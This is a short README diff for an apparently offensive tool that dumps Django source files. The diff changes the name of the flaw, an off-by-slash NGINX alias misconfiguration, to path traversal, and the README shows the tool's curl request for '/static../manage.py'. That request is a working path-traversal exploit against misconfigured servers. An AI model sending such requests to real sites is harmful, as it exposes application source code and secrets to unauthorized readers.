adamyordan/offbyslash-django-dumper/README.md

 ## Explanation

-This dumper works by using a local file inclusion vulnerability caused by a misconfiguration when using NGINX to serve static files.
+This dumper works by using a path traversal vulnerability caused by a misconfiguration when using NGINX to serve static files.
 Equivalent curl command used by this dumper to dump local files is:
 ```bash
 $ curl http://django-site.com/static../manage.py